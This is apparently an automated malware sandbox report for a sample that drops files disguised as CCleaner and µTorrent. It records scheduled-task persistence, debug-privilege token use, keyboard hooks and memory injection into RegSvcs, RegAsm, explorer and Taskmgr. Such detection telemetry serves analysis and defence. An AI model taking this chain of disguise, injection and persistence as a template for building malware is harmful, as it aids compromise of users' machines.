Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\SysWOW64\Taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\SysWOW64\Taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\SysWOW64\Taskmgr.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NetFramework.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Project1.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1560 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
PID 1560 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
PID 1560 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
PID 1560 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\cleaner.exe
PID 1560 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\cleaner.exe
PID 1560 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\cleaner.exe
PID 1560 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Torrent.exe
PID 1560 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Torrent.exe
PID 1560 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
PID 1560 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
PID 1560 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe
PID 1560 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe
PID 1560 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Project1.exe
PID 1560 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1560 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1560 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1560 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1560 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3104 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 3104 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 3104 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 3104 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 3104 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1560 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\SysWOW64\schtasks.exe
PID 1560 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\SysWOW64\schtasks.exe
PID 1560 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe C:\Windows\SysWOW64\schtasks.exe
PID 3104 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 3104 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 3104 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\cleaner.exe C:\Windows\SysWOW64\schtasks.exe
PID 4928 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 4928 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\Torrent.exe C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
PID 3316 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Windows\explorer.exe
PID 3316 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Windows\explorer.exe
PID 3316 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Windows\explorer.exe
PID 3316 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Windows\explorer.exe
PID 3316 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Windows\explorer.exe
PID 3316 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Windows\explorer.exe
PID 3316 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\μTorrent.exe C:\Windows\explorer.exe
PID 1960 wrote to memory of 3976 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\Taskmgr.exe
PID 1960 wrote to memory of 3976 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\Taskmgr.exe
PID 1960 wrote to memory of 3976 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\Taskmgr.exe
PID 904 wrote to memory of 2432 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 904 wrote to memory of 2432 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 904 wrote to memory of 2432 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 904 wrote to memory of 2432 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 904 wrote to memory of 2432 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 904 wrote to memory of 4168 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\SysWOW64\schtasks.exe
PID 904 wrote to memory of 4168 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\SysWOW64\schtasks.exe
PID 904 wrote to memory of 4168 N/A C:\Users\Admin\secinit\sdchange.exe C:\Windows\SysWOW64\schtasks.exe
PID 856 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 856 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 856 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 856 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 856 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 856 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\SysWOW64\schtasks.exe
PID 856 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\SysWOW64\schtasks.exe
PID 856 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe C:\Windows\SysWOW64\schtasks.exe
PID 1348 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1348 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1348 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1348 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1348 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 1348 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\SysWOW64\schtasks.exe
